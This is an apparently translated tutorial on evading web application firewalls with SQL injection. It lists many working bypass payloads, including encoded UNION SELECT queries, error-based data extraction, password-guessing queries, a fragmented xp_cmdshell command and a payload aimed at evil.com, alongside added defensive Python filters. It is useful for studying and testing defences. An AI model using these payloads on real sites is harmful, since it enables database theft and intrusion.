2025-01-23 update. Source: SLTechnology News&Howtos (shulou.com), Network Security.
Shulou (Shulou.com) 05/31 report
This article covers SQL injection bypass techniques in web security. In real engagements many people run into exactly these situations, so this piece walks through how to deal with them. Read it carefully and you should get something out of it.
0x1 Common features of WAF
The reason for discussing the common features of a WAF is to understand how it works, and so to improve the odds of bypassing it. This article does not cover WAFs in detail; it only touches on a few relevant points.
Generally speaking, a WAF (Web Application Firewall) has the following four functions:
1. Audit device: intercepts all HTTP traffic, or only the sessions that match certain rules
2. Access control device: controls access to the web application, in either active or passive security mode
3. Architecture / network design tool: when running in reverse proxy mode it can distribute functions, centralise control, virtualise infrastructure, and so on
4. Web application hardening tool: enhances the security of the protected application by shielding inherent weaknesses of web applications and by covering risks caused by programming errors in the application itself
Common features of a WAF:
Protocol anomaly detection: rejects requests that do not conform to the HTTP standard
Enhanced input validation: validation at the proxy and on the server side, not only on the client
Whitelist & blacklist: whitelists suit stable web applications; blacklists suit dealing with known problems
Rule-based and anomaly-based protection: rule-based protection relies mostly on a blacklist mechanism; anomaly-based protection is more flexible
State management: focuses on session protection
In addition there is cookie protection, anti-evasion technology, response monitoring and information-leak protection, etc.
If the client is a scanner, the WAF has its own ways of identifying it. Scanner recognition mainly relies on the following points:
1) Scanner fingerprints (header fields / request parameter values). Take WVS as an example: its requests carry an obvious Acunetix marker.
2) The number of times a single IP + cookie triggers a rule within a given period
3) Hidden link tags, etc.
4) Cookie implantation
5) CAPTCHA verification, which a scanner cannot fill in automatically
6) The proportion of 404 status codes the web server returns to a single IP within a request window: a scanner probes for sensitive directories from a dictionary, and every file that does not exist comes back as 404
0x2 Methods of bypassing WAF
From what I have found so far, I have classified the techniques for bypassing a WAF into nine categories, ranging from rudimentary to advanced:
A) Mixed case
B) Keyword replacement
C) Using encodings
D) Using comments
E) Equivalent functions and commands
F) Special symbols
G) HTTP parameter control
H) Buffer overflow
I) Combined bypass
A) Case bypass
Case bypass works against keyword matching that only covers lowercase or only uppercase. A regular expression that is not case-sensitive, such as /express/i, cannot be bypassed this way. It is the simplest bypass technique.
For example: z.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4
The likely scenario is that the filter rules do perform case conversion, but not for every keyword or not in every place.
B) Keyword replacement
In this case a change of case does not get through, and the regular expression replaces or deletes keywords such as select and union. If it only matches once, it is easy to bypass.
For example: z.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4
After one pass deletes the inner union and select, what remains is UNION SELECT. This is also a basic technique, and sometimes the nesting goes deeper: SeLSeselectleCTecT survives two passes of deletion before becoming SELECT. Do not expect too much of it.
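The two filters described above, and why a single pass of deletion is not enough, as an added example that is not part of the original article. The filters, the sample payloads and the SQLite table are all constructed here; `strip_to_fixpoint` is the usual hardening of a delete-the-keyword filter, and `safe_lookup` shows the fix that makes the filter irrelevant, a parameterised query:

```python
import re
import sqlite3

KEYWORDS = ("union", "select")


def strip_once(payload: str) -> str:
    """Constructed filter 1: delete the lowercase keywords, one pass each.
    Case-sensitive, so section A's mixed-case payload passes untouched."""
    for kw in KEYWORDS:
        payload = payload.replace(kw, "")
    return payload


def strip_once_ci(payload: str) -> str:
    """Constructed filter 2: the same deletion, but case-insensitive.
    Still one pass, so UNIunionON collapses to UNION after the inner
    'union' is removed (section B)."""
    return re.sub("|".join(KEYWORDS), "", payload, flags=re.I)


def strip_to_fixpoint(payload: str) -> str:
    """Hardened deletion: repeat until a pass removes nothing, so keywords
    reassembled from the pieces around a deleted keyword are deleted too.
    It is still a blacklist; it only neutralises this particular trick."""
    while True:
        stripped = strip_once_ci(payload)
        if stripped == payload:
            return stripped
        payload = stripped


def safe_lookup(page_id: str) -> list:
    """The real fix: a parameterised query. The payload is bound as a value
    and never reaches the SQL parser as code. In-memory SQLite with one
    constructed row stands in for the application's database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages(id INTEGER, title TEXT)")
    con.execute("INSERT INTO pages VALUES (15, 'home')")
    return con.execute("SELECT title FROM pages WHERE id = ?", (page_id,)).fetchall()


if __name__ == "__main__":
    for p in ("-15 uNIoN sELecT 1,2,3,4",
              "-15 UNIunionON SELselectECT 1,2,3,4",
              "-15 SeLSeselectleCTecT 1"):
        print(f"{p!r:42} once={strip_once(p)!r} ci={strip_once_ci(p)!r} "
              f"fixpoint={strip_to_fixpoint(p)!r}")
    print(safe_lookup("15"), safe_lookup("-15 uNIoN sELecT 1,2,3,4"))
```

Note that `SeLSeselectleCTecT` needs three rounds of case-insensitive deletion before nothing is left: one round yields `SeLSeleCTecT`, two yield `SeLecT`. The fixpoint loop handles any depth of nesting, but the payload still reaches the query as text; only the parameterised query removes the class of bug.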
C) Using encodings
1. URL encoding
When you enter a URL in Chrome, the browser percent-encodes the non-reserved characters, e.g. space becomes %20, single quote %27, opening parenthesis %28, closing parenthesis %29.
Ordinary URL encoding usually does not get through. But there are cases where the filter URL-decodes only once while the application decodes again, so double encoding gets through: page.php?id=1%252f%252a*/UNION%252f%252a*/SELECT
After the first decode this reads 1%2f%2a*/UNION%2f%2a*/SELECT; after the second it becomes 1/**/UNION/**/SELECT.
2. Hexadecimal encoding
For example: z.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4
SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))
In the sample code, the former encodes a single character in hex, while the latter encodes whole strings (0x3C613E61646D696E3C2F613E is <a>admin</a> and 0x2f61 is /a); the latter form is less common in practice.
3. Unicode encoding
Unicode has so-called standard and non-standard encodings. If the UTF-8 we use is the standard encoding, then the Western European language family uses non-standard encodings.
Some Unicode encodings of a few commonly used symbols:
Single quote: %u0027, %u02b9, %u02bc, %u02c8, %u2032, %uff07, %c0%27, %c0%a7, %e0%80%a7
Space: %u0020, %uff00, %c0%20, %c0%a0, %e0%80%a0
Left parenthesis: %u0028, %uff08, %c0%28, %c0%a8, %e0%80%a8
Right parenthesis: %u0029, %uff09, %c0%29, %c0%a9, %e0%80%a9
Example: ?id=10%D6'%20AND%201=2%23
SELECT 'of'='A'; # 1
In the first example a double-byte (wide-byte) bypass is used: if the single quote is escaped to \', the bytes become %D6%5C%27, and %D6%5C is consumed as one multibyte character by the database's connection charset, so the single quote survives unescaped and can be used normally.
The second example compares two differently encoded characters, and the result may be True or False. The key point is that Unicode has many encodings, and a blacklist-based filter cannot cover all of them, which is what makes the bypass possible.
Beyond these, what you hear about somewhat more often is the UTF-7 bypass, and also the UTF-16 and UTF-32 bypasses, the latter from a successful bypass of Google; interested readers can look them up.
Of course there are also the common binary and octal encodings; not all of them are useful, but an example using binary will appear later.
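The two decoding mismatches described in this section, double URL decoding (C.1) and the wide-byte escape bypass (C.3), as an added example that is not part of the original article. The WAF rule, the backend's second `unquote`, the `addslashes`-style escaper and the parameter values are all constructed here; `gbk` stands in for whichever multibyte connection charset the database uses:

```python
import re
from urllib.parse import unquote, unquote_to_bytes

# Constructed WAF rule: UNION, then blanks or comment characters, then SELECT.
UNION_SELECT = re.compile(r"union[\s/*]+select", re.I)


def waf_blocks(raw_param: str) -> bool:
    """Constructed WAF: percent-decodes the parameter ONCE, then applies the rule.
    After one decode, %252f%252a*/ is still %2f%2a*/ and does not match."""
    return UNION_SELECT.search(unquote(raw_param)) is not None


def backend_sql(raw_param: str) -> str:
    """Constructed backend: the web framework decoded once, and the application
    (wrongly) urldecodes a second time before concatenating the SQL."""
    return "SELECT title FROM pages WHERE id=" + unquote(unquote(raw_param))


def escape_quotes(data: bytes) -> bytes:
    """Byte-wise stand-in for PHP's addslashes(): a backslash before ' " and \\."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escaped_as_seen_by_db(raw_param: str, charset: str) -> str:
    """Decode the parameter to bytes, escape it, then read the bytes in the
    connection charset, which is how the database server tokenises them.
    Under gbk the pair 0xD6 0x5C is one character, swallowing the backslash."""
    return escape_quotes(unquote_to_bytes(raw_param)).decode(charset, errors="replace")


def quote_is_live(raw_param: str, charset: str) -> bool:
    """True when a single quote survives escaping without a backslash in front."""
    return "'" in escaped_as_seen_by_db(raw_param, charset).replace("\\'", "")


if __name__ == "__main__":
    for p in ("1/**/UNION/**/SELECT 1", "1%252f%252a*/UNION%252f%252a*/SELECT 1"):
        print(f"{p:42} waf_blocks={waf_blocks(p)} backend={backend_sql(p)}")
    wide = "10%D6'%20AND%201=2%23"
    for cs in ("gbk", "utf-8"):
        print(cs, repr(escaped_as_seen_by_db(wide, cs)), quote_is_live(wide, cs))
```

The defensive reading of both cases is the same: the component that inspects input must decode exactly as many times, and in the same charset, as the component that consumes it. For the wide-byte case that means setting the connection charset through the driver (so the escaper knows it) or, better, binding values as parameters instead of escaping them into the statement.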
D) Using comments
Common comment symbols: //, --, /**/, #, --+, -- -, ;, --a
1. Ordinary comments
For example: z.com/index.php?page_id=-15%55nION/**/%53ElecT 1,2,3,4
'union%a0select pass from users#
/**/ is inserted into the constructed query to avoid depending on spaces and to break keyword recognition; # and --+ are used to terminate the statement.
2. Inline comments
Inline comments are used more often than ordinary comments. Their distinguishing feature is that /*!...*/ is executed only by MySQL (and, with a version number such as /*!50000...*/, only by MySQL at or above that version).
For example: index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1
[Second example: a longer payload combining /*!50000...*/ inline comments, ordinary comments and %0A newlines; it did not survive extraction.]
In these two examples the former uses only inline comments, while the latter also uses ordinary comments. A very useful trick with comments is splitting keywords, which can also be done with the special characters discussed later, provided the characters involved, including / and *, can be used normally.
E) Equivalent functions and commands
Some functions or commands cannot be used because their keywords are detected, but in many cases they can be replaced by equivalent or similar code.
1. Functions or variables
hex(), bin() => ascii()
sleep() => benchmark()
concat_ws() => group_concat()
mid(), substr() => substring()
@@user => user()
@@datadir => datadir()
For example, when substring() and substr() cannot be used: ?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Or: substr((select 'password'),1,1)=0x70
strcmp(left('password',1),0x69)=1
strcmp(left('password',1),0x70)=0
strcmp(left('password',1),0x71)=-1
These examples illustrate that when one function cannot be used, another can often be found to do the same job. How to deal with restrictions on keywords such as select, union and where will be discussed later in the filter section.
2. Symbols
and and or may not be usable; try && and || instead. If = cannot be used, try < and >: a value that is neither less than nor greater than another is equal to it.
Spaces are used even more often, and the following can stand in for them: %20, %09, %0a, %0d, %a0, /**/
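Detection logic for the comment and whitespace tricks of sections D and E.2, as an added example that is not part of the original article: a naive `union\s+select` rule applied to the raw parameter, beside a normaliser that decodes once, unwraps MySQL's `/*!...*/` inline comments, turns other comments into blanks and collapses every blank MySQL accepts. The rules and the sample parameter values are constructed here:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample parameter values -> whether they are injection attempts.
# The first four are the payloads from sections D and E.2; the last two are benign.
SAMPLES = {
    "-15%20uNIoN%20sELecT%201,2,3,4": True,
    "-15%55nION/**/%53ElecT%201,2,3,4": True,
    "'union%a0select%20pass%20from%20users%23": True,
    "-15%20/*!UNION*/%0A/*!50000SELECT*/%091": True,
    "15": False,
    "union%20station%20select%20board": False,
}

NAIVE = re.compile(r"union\s+select", re.I)


def naive_match(raw_param: str) -> bool:
    """A rule run on the raw parameter. Beaten by /**/, %a0, %0A and %09
    (none of them is \\s before decoding) and by %55nION (the keyword is
    not even visible before decoding)."""
    return NAIVE.search(raw_param) is not None


def normalize(raw_param: str) -> str:
    """Canonical form to match against:
    1. percent-decode once ('+' is a space in a query string); latin-1 keeps
       %a0 as a single character instead of a decoding error
    2. /*!UNION*/ and /*!50000UNION*/ become their contents, since MySQL executes them
    3. every remaining /* ... */ becomes one space, since MySQL treats it as blank
    4. all blank-like characters collapse to one space; lowercase for matching"""
    s = unquote_plus(raw_param, encoding="latin-1")
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"[\s\xa0]+", " ", s)
    return s.strip().lower()


# No leading \b: MySQL accepts -15union, so the keyword may follow a digit.
UNION_SELECT = re.compile(r"union\b(?: all| distinct)? select\b")


def normalized_match(raw_param: str) -> bool:
    """The same intent as NAIVE, applied to the normalised form."""
    return UNION_SELECT.search(normalize(raw_param)) is not None


def evaluate(samples=SAMPLES) -> dict:
    """Per sample: (naive verdict correct?, normalised verdict correct?)."""
    return {p: (naive_match(p) == want, normalized_match(p) == want)
            for p, want in samples.items()}


if __name__ == "__main__":
    for p, (naive_ok, norm_ok) in evaluate().items():
        print(f"{p:45} normalised={normalize(p)!r:38} naive_ok={naive_ok} norm_ok={norm_ok}")
```

The normaliser is deliberately MySQL-specific (inline comments, %a0 as blank); a WAF in front of PostgreSQL or MSSQL needs its own canonical form, which is the underlying reason a single blacklist keeps falling behind the dialects it is supposed to cover.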
3. Obscure functions
MySQL and PostgreSQL support XML functions: SELECT UpdateXML('<script x=":"></script>','/script/@x','src=//evil.com');
?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))
SELECT xmlelement(name img,xmlattributes(1 as src,'a\l\x65rt(1)' as \117n\x65rror)); -- PostgreSQL
?id=1 and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)))
MySQL, PostgreSQL and Oracle each have many functions of their own. It is practically impossible, and costly, for a blacklist-based filter to cover all of them, which shows the limits of blacklist technology.
F) Special symbols
Here I have put all non-alphanumeric characters into the category of special symbols; they have particular meanings and usages and involve more information than the previous categories.
Let's look at a few examples from the article "waf bypass techniques" on WooYun drops:
1. Backquotes, e.g. select`version()`, get past spaces and regular expressions, and in special cases can also serve as comment markers
2. The magic "-+.": select+id-1+1.from users; "+" is used for string concatenation, and "-" and "." also act as connectors here, avoiding spaces and keyword filtering
3. The @ symbol: select@^1.from users; @ is used for variable definitions such as @var_name, a single @ for user variables and @@ for system variables
4. MySQL's function() as xxx can also bypass space restrictions, even without as and without spaces: select-count(id)test from users;
As you can see, a lot can be done with these characters, which confirms the old saying: nothing is impossible, only unthought of.
I have collected some characters that may play an important role (excluding ', *, / and so on): `, ~, !, @, %, (), [], ., -, +, |
For example:
Keyword split: 'se'+'lec'+'t'
S%E%L%E%C%T 1
1.aspx: exec('ma'+'ster..x'+'p_cm'+'dsh'+'ell "net user"')
! and (): 'or--+2=- -!!'2
In id=1+(UnI)(oN)+(SeL)(EcT): in Access, "[]" is used for tables and columns, and "()" can also be used as a separator between tokens.
To close this section, some operators related to these characters are listed for reference:
> >